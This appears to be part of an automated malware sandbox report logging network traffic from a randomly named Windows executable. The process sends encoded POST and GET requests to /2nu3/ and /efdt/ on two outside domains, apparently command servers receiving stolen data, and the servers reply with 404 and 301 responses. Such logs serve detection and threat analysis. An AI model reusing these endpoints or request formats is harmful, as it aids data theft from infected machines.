                                                  Data Raw: 77 64 39 38 58 4a 70 3d 70 72 71 2f 4a 78 31 75 34 72 6c 69 4d 7a 45 58 36 38 57 6f 75 4c 73 69 30 44 58 70 34 69 35 51 48 7a 58 49 52 5a 4b 61 42 34 4a 46 35 74 4b 66 6f 76 47 5a 73 78 52 77 58 6d 31 2b 41 47 75 6c 77 69 66 37 48 63 4e 53 42 38 41 63 6c 42 2f 49 50 71 4c 2f 46 38 56 5a 68 44 4b 5a 77 59 78 61 6f 74 43 34 46 42 79 43 57 30 52 4b 57 42 51 56 2f 4f 6c 4b 67 37 6a 57 6f 77 7a 72 57 64 70 64 42 59 6f 55 31 35 4b 66 53 6c 37 6a 52 49 71 33 52 49 67 34 51 33 42 72 72 55 37 33 2b 6d 65 31 73 43 75 45 53 64 2f 5a 4a 42 69 53 56 4b 48 4a 4b 68 4c 37 4f 6e 5a 56 34 56 58 73 61 37 47 6e 49 51 3d 3d
                                                  Data Ascii: wd98XJp=prq/Jx1u4rliMzEX68WouLsi0DXp4i5QHzXIRZKaB4JF5tKfovGZsxRwXm1+AGulwif7HcNSB8AclB/IPqL/F8VZhDKZwYxaotC4FByCW0RKWBQV/OlKg7jWowzrWdpdBYoU15KfSl7jRIq3RIg4Q3BrrU73+me1sCuESd/ZJBiSVKHJKhL7OnZV4VXsa7GnIQ==
                                                  Jul 2, 2024 14:07:29.294024944 CEST698INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgQ6PgazQjAPUs2hqKekXcmDvbNnJlO6Id6UqY8pMnUc5myRrVKxyyC6sEnavsTGfhPch7olsMUBk%2FINfw1pTT0XMj0eLzMq%2FEQ1mWIh1dMeSJsQtHuYNcapZGo41JkSk9SPkanK1AfcS1ZH"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce840689ae4205-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449747172.67.200.242801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:31.173074961 CEST815OUTPOST /2nu3/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.personalcaresale.shop
                                                  Origin: http://www.personalcaresale.shop
                                                  Referer: http://www.personalcaresale.shop/2nu3/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 70 72 71 2f 4a 78 31 75 34 72 6c 69 4d 51 63 58 38 73 71 6f 72 72 73 74 37 6a 58 70 32 43 34 5a 48 7a 62 49 52 59 4f 4b 43 4e 52 46 36 4e 36 66 72 71 79 5a 74 78 52 77 66 47 31 37 45 47 75 71 77 69 62 64 48 64 64 53 42 38 38 63 6c 45 37 49 4f 5a 6a 38 44 38 56 62 35 7a 4b 58 2b 34 78 61 6f 74 43 34 46 42 6d 6b 57 30 5a 4b 57 78 67 56 2b 73 4e 4a 70 62 6a 56 76 77 7a 72 41 74 70 5a 42 59 70 78 31 34 57 6c 53 6e 7a 6a 52 4d 69 33 52 5a 67 33 4a 6e 42 74 32 6b 37 68 78 47 33 63 30 77 72 49 59 61 58 31 51 54 32 4b 64 73 57 54 62 51 71 73 63 6e 39 6d 6c 53 65 59 58 34 37 75 54 52 42 34 38 32 33 64 61 72 2f 6d 78 4c 62 48 4a 4d 5a 75 36 4d 6f 3d
                                                  Data Ascii: wd98XJp=prq/Jx1u4rliMQcX8sqorrst7jXp2C4ZHzbIRYOKCNRF6N6frqyZtxRwfG17EGuqwibdHddSB88clE7IOZj8D8Vb5zKX+4xaotC4FBmkW0ZKWxgV+sNJpbjVvwzrAtpZBYpx14WlSnzjRMi3RZg3JnBt2k7hxG3c0wrIYaX1QT2KdsWTbQqscn9mlSeYX47uTRB4823dar/mxLbHJMZu6Mo=
                                                  Jul 2, 2024 14:07:31.817847013 CEST704INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=debBEllbuh7hmv%2Fkp%2BYCMaDVvz7Mwcgdti%2BENkmS3GcqLtw7019zPl2UQ01E4vOlOObWvNj3kSAR6GEaZofestAG3IESC%2FT6GeY7Qh4Za1tpYi6qNlfsLT2ESZMeXgyVGF%2Bp9pyA39JOMZfP"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce84167bac1821-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.449748172.67.200.242801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:33.704408884 CEST10897OUTPOST /2nu3/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.personalcaresale.shop
                                                  Origin: http://www.personalcaresale.shop
                                                  Referer: http://www.personalcaresale.shop/2nu3/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 70 72 71 2f 4a 78 31 75 34 72 6c 69 4d 51 63 58 38 73 71 6f 72 72 73 74 37 6a 58 70 32 43 34 5a 48 7a 62 49 52 59 4f 4b 43 4f 78 46 35 2f 79 66 70 4e 65 5a 71 78 52 77 56 6d 31 36 45 47 75 4e 77 69 6a 5a 48 59 45 74 42 35 34 63 33 32 7a 49 48 49 6a 38 57 4d 56 62 77 54 4b 57 77 59 78 31 6f 73 79 47 46 42 32 6b 57 30 5a 4b 57 79 34 56 33 65 6c 4a 76 62 6a 57 6f 77 7a 76 57 64 70 68 42 59 51 4d 31 34 69 31 56 57 54 6a 53 74 65 33 64 4c 34 33 42 6e 42 76 33 6b 36 69 78 47 72 48 30 77 33 75 59 66 72 62 51 52 71 4b 59 49 2f 70 48 54 4f 4d 66 31 4a 2b 79 6a 32 48 63 61 4b 6f 56 44 46 6c 37 45 58 2b 50 36 54 66 33 62 4b 79 4d 4d 31 6d 75 70 6c 45 66 67 45 38 68 6d 43 75 49 41 4e 42 5a 78 33 6f 74 34 64 6a 41 73 57 5a 47 33 6e 50 36 41 39 77 74 44 31 39 76 54 58 30 48 68 4d 32 67 45 32 6f 46 55 66 4a 63 68 6a 6a 57 72 4b 66 2b 67 55 48 71 4a 4b 55 4e 58 43 39 34 58 65 48 30 6c 68 61 6a 73 30 30 52 2f 58 77 68 41 46 65 30 48 71 6d 4a 43 70 48 77 6b 65 7a 47 51 58 57 36 75 6d 6f 31 43 [TRUNCATED]
                                                  Data Ascii: wd98XJp=prq/Jx1u4rliMQcX8sqorrst7jXp2C4ZHzbIRYOKCOxF5/yfpNeZqxRwVm16EGuNwijZHYEtB54c32zIHIj8WMVbwTKWwYx1osyGFB2kW0ZKWy4V3elJvbjWowzvWdphBYQM14i1VWTjSte3dL43BnBv3k6ixGrH0w3uYfrbQRqKYI/pHTOMf1J+yj2HcaKoVDFl7EX+P6Tf3bKyMM1muplEfgE8hmCuIANBZx3ot4djAsWZG3nP6A9wtD19vTX0HhM2gE2oFUfJchjjWrKf+gUHqJKUNXC94XeH0lhajs00R/XwhAFe0HqmJCpHwkezGQXW6umo1CG1u3xCJaiRnw9F3Dhix91fk2VJlDyscfuvNN05Cnh6HhN+kNLBj1FOHK8F3hWuLmpe5U0EZ3qyss89ruXXKYu+knHsq4XoOi8Iw3VxyV1GkJ6iLLfhmbQf49sa00elM3AYVJQBQ8gDEDUqjMRVdedddYzlo1dIJidx3EKhCquj+kmHQRphhL4SpddS9UacJZErulHeqyR4DmSyicZzKfxwrEqLYZcW0Kg4V4FjwpjKazyc47o9ymdldSWpK1VVAFZgC1cBUv+QvxOgN5BfKVYlvwEyN8WTzV2cWibQ91SE0tYCfy6xu9eFoLTxUsdSbhuQy5RqLj3m8VjkM6foZR+20nbRVQnY7PBRx8VgssQg0ed5ukLFr2Y1vMGtlhWKaQWIhTX/++CwOaoEP8sLuQr1JWoZ20hmPijUarxlBjo3q9RtZYpPjdmeH+Vdoyi26SaKUoC9/kQ7oL0vW8/BmsMvKrf92Ab+32i+JPUdDL4T7N5MHvzfADzwhgcBEmomHoICI1XyEV0fHLMIr8XokwWmZwQnINfw65GiluYBKBrr+qHl6hsnz1Nd1zbvpH/vK3PTPZF5ISCZ7dFvgmu86oqpyuex/M+/wZVzpOzAMaAbhzpukFxs9ArFMAMJAl9dn286FsPWFtb3fqGmLUYBmif0xe2rBUZFwf+7 [TRUNCATED]
                                                  Jul 2, 2024 14:07:34.369199038 CEST710INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:34 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9BYAb5vbW1K6nC6RV4oLXf16PUUuQXZfWNp%2BuEyOlPEOdo89STy8vh%2BorYzM27u9U6trgm3Lgfprxg28XYGrqoPf%2FzuEYHkFsB2d0a%2F%2BjzSxuN%2F9yZb1ZAI9Ro6Qn%2BgqjVO7ci51e2g4QgV"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce84263eea8cd4-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.449749172.67.200.242801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:36.301714897 CEST508OUTGET /2nu3/?wd98XJp=kpCfKF0WzJdSazQmt+Slz7YMxCL88Ck3GTDuMNK/H/Z7+vSkhcWJrxIVRHFhCg6b5G6dYsxeFoEulnLMEOj8SMB4wRe40fAIutKuKCnjbT5TVzUJ6OZr4Zg=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.personalcaresale.shop
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:07:36.996526003 CEST649INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:07:36 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Powered-By: PHP/7.4.33
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4pVlZTadzumTYubhaf45%2BwB%2FNrUygRG3bkw8VZLNM3tXwK%2BTlA00iq3qIhkI%2BUzQdD4cEG2XkKKVD4bt%2FeKFQGjGJvRZE9CqgCFT8qCPVgv80ZuozuWyEjN7wwfT21MMtJbYKKQ6u0n2Fnz"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce843659f5437b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.449750188.114.97.3801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:42.060544014 CEST765OUTPOST /efdt/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.coinwab.com
                                                  Origin: http://www.coinwab.com
                                                  Referer: http://www.coinwab.com/efdt/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 42 43 6a 48 46 5a 79 34 50 6b 39 72 66 66 38 35 72 31 50 62 74 75 4a 51 4b 51 4a 7a 6d 5a 45 73 44 52 63 30 55 55 45 79 68 2f 75 30 39 57 65 54 53 70 50 73 6b 73 30 5a 5a 6d 45 46 4a 47 58 4a 53 78 5a 69 46 32 56 37 64 6b 4e 31 32 59 61 73 41 49 61 52 77 42 36 48 31 35 7a 4c 44 58 63 51 5a 45 47 5a 34 41 47 48 36 4c 78 49 43 34 6b 47 39 4a 63 69 56 55 2f 66 4b 76 33 4c 38 6f 74 54 76 4e 7a 49 75 32 49 4b 57 42 46 4d 7a 4c 70 70 65 52 6e 45 33 4f 35 66 76 4a 32 34 30 36 5a 6d 6e 61 37 69 44 38 63 72 37 6e 67 31 44 32 5a 36 57 50 6d 34 75 65 4a 6f 2b 57 6c 48 54 6d 65 41 2b 67 3d 3d
                                                  Data Ascii: wd98XJp=BCjHFZy4Pk9rff85r1PbtuJQKQJzmZEsDRc0UUEyh/u09WeTSpPsks0ZZmEFJGXJSxZiF2V7dkN12YasAIaRwB6H15zLDXcQZEGZ4AGH6LxIC4kG9JciVU/fKv3L8otTvNzIu2IKWBFMzLppeRnE3O5fvJ2406Zmna7iD8cr7ng1D2Z6WPm4ueJo+WlHTmeA+g==
                                                  Jul 2, 2024 14:07:42.956278086 CEST901INHTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:42 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AdAGhg2fbb%2BK3H71Y3S%2BSatyzg1aGSwoc%2B51qkebXGZtN6by0lNfoi2AHr92sTLCb%2F7loIgDqeiGv7IQehhS%2FflAlCkCx%2B7llJo3uABiiN0oMBnawAFHmALBT84unj6FU8o%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce845bfd3d7277-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/">here</a>.</p></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.449751188.114.97.3801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:44.596745014 CEST785OUTPOST /efdt/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.coinwab.com
                                                  Origin: http://www.coinwab.com
                                                  Referer: http://www.coinwab.com/efdt/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 42 43 6a 48 46 5a 79 34 50 6b 39 72 66 2f 73 35 70 53 6a 62 72 4f 4a 54 55 67 4a 7a 2f 4a 45 6f 44 52 41 30 55 56 42 70 69 4a 65 30 36 30 47 54 52 6f 50 73 6c 73 30 5a 42 57 45 41 4e 47 58 53 53 78 55 43 46 30 78 37 64 6b 4a 31 32 59 71 73 44 37 69 57 79 52 36 46 35 5a 7a 4e 4f 33 63 51 5a 45 47 5a 34 41 43 70 36 4c 35 49 46 4a 55 47 38 73 38 68 4a 6b 2f 51 61 2f 33 4c 32 49 74 66 76 4e 7a 36 75 30 39 68 57 43 74 4d 7a 4a 42 70 65 6c 4c 46 38 4f 35 46 68 70 32 75 30 34 46 72 69 2f 53 63 63 38 4d 63 37 7a 6b 4c 50 51 49 67 48 2b 48 76 38 65 74 62 6a 52 73 7a 65 6c 6a 4a 6c 6c 4d 78 46 67 69 54 6f 4b 44 61 32 70 4b 54 41 64 76 78 72 73 30 3d
                                                  Data Ascii: wd98XJp=BCjHFZy4Pk9rf/s5pSjbrOJTUgJz/JEoDRA0UVBpiJe060GTRoPsls0ZBWEANGXSSxUCF0x7dkJ12YqsD7iWyR6F5ZzNO3cQZEGZ4ACp6L5IFJUG8s8hJk/Qa/3L2ItfvNz6u09hWCtMzJBpelLF8O5Fhp2u04Fri/Scc8Mc7zkLPQIgH+Hv8etbjRszeljJllMxFgiToKDa2pKTAdvxrs0=
                                                  Jul 2, 2024 14:07:45.270081043 CEST893INHTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:45 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvgJoDDKsjJ55RgW48s1%2BYdwlwsz0eoAAcCLjBRJ4AYivFaqbmKkSfdBdrRWbLt6f8rPXw1u0SqskhKs6t3FhISdj7TO7iqFhZUpjhySMww8UpX1CxvJ%2B3h3kjx1VvuGF3Q%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89ce846a6f398c77-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 69 6e 77 61 62 2e 63 6f 6d 2f 69 6e 64 65 78 2e 70 68 70 2f 65 66 64 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://coinwab.com/index.php/efdt/">here</a>.</p></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.449752188.114.97.3801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:07:47.126827955 CEST10867OUTPOST /efdt/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.coinwab.com
                                                  Origin: http://www.coinwab.com
                                                  Referer: http://www.coinwab.com/efdt/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 42 43 6a 48 46 5a 79 34 50 6b 39 72 66 2f 73 35 70 53 6a 62 72 4f 4a 54 55 67 4a 7a 2f 4a 45 6f 44 52 41 30 55 56 42 70 69 4b 2b 30 36 48 4f 54 52 50 6a 73 30 63 30 5a 49 32 45 42 4e 47 57 43 53 78 38 64 46 30 4d 4f 64 6d 42 31 77 37 69 73 47 4b 69 57 37 52 36 46 78 35 7a 4d 44 58 63 5a 5a 41 71 64 34 44 71 70 36 4c 35 49 46 4b 38 47 34 35 63 68 61 30 2f 66 4b 76 32 45 38 6f 73 4b 76 4a 66 51 75 30 70 58 52 7a 4e 4d 79 70 52 70 4e 32 7a 46 31 4f 35 44 6d 70 33 74 30 34 49 72 69 37 4c 74 63 2f 52 4c 37 30 73 4c 63 6c 39 38 43 62 6e 2f 2b 34 42 6b 67 47 45 6f 65 6e 4c 77 71 57 55 35 42 67 2b 48 30 5a 44 77 79 35 62 2b 46 5a 53 31 2f 59 53 77 68 56 77 4b 69 6b 73 43 51 59 58 6a 77 68 2b 35 73 61 2b 65 48 54 42 32 49 6f 63 61 4a 35 64 55 59 66 5a 71 42 4a 69 78 76 70 33 2b 30 46 47 76 64 49 69 63 6b 58 38 36 7a 5a 37 7a 67 47 47 30 76 33 46 62 54 33 64 47 43 62 6f 56 61 6b 30 70 4e 75 4c 6e 4f 4a 67 6f 6c 36 6d 34 6a 5a 39 59 50 55 4d 63 4e 58 43 6c 44 74 38 57 6a 4e 68 74 2b 44 [TRUNCATED]
                                                  Data Ascii: wd98XJp=BCjHFZy4Pk9rf/s5pSjbrOJTUgJz/JEoDRA0UVBpiK+06HOTRPjs0c0ZI2EBNGWCSx8dF0MOdmB1w7isGKiW7R6Fx5zMDXcZZAqd4Dqp6L5IFK8G45cha0/fKv2E8osKvJfQu0pXRzNMypRpN2zF1O5Dmp3t04Iri7Ltc/RL70sLcl98Cbn/+4BkgGEoenLwqWU5Bg+H0ZDwy5b+FZS1/YSwhVwKiksCQYXjwh+5sa+eHTB2IocaJ5dUYfZqBJixvp3+0FGvdIickX86zZ7zgGG0v3FbT3dGCboVak0pNuLnOJgol6m4jZ9YPUMcNXClDt8WjNht+DRikrzR/ZozYWxVKdqM+tM4MugT/LaOwYok66KOscdLw+7P/p3YBmIDKt1tHiDA3rEfhmsm2hvn+plm8yPPxWo50fUWOdZ0zVZjnP7QaiXHF8768PW4L+oTSvJEoo9nveLHjFKUx1yWv4NAT2m9M8zvtJKlfVkJgmeDCDwnlts+3juBX+B+qdKsLlBysgpWvXHxG7fKJnYVN9ebiZfFMDzLtOui/TVZp8m+HQ4vjjJKNThsQgVVHMWpufwIpNxZGU1WqX3D2PhtMQvGYImc9RJyUbLiL7v/DVTIGhX0NJ7m0ZJ6D/sWDJBLAy7w2eomeoye9Cqb+lMApnBTGUxprsaVupLFdDGU0tmX6L3Hd+RvksV88CrvQruh5px6td+zqPE7XJ2bjaxXHxmCkSPyGL63VH/Ch0Lwq1dF/Jq4uTxz6o44GDGCzg4bfbsMhqgLWXlygACwJKrz6qYTnmglscRC9Tdm2ZpOjJKHh9RsDEpNC3VA/Hu2hAQdiV9nGxLmEAFvddTnuv8y35PLeONHXYg7sTu7Sp5zdFQGr8m7PhsNgi/Erz9bPttO3aCwFYQsrq7XDib+3SEnokhG29tThKnKsrxHNTyDWgBHHUnYqqdcbOE9+f11CnrHpnWpuJ7RLhQ56C6vA6RxsKjDvU9qz7DA+RMwsrVSm/Ep [TRUNCATED]
                                                  Jul 2, 2024 14:07:47.795835018 CEST895INHTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 02 Jul 2024 12:07:47 GMT
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  location: https://coinwab.com/index.php/efdt/
                                                  CF-Cache-Status: DYNAMIC
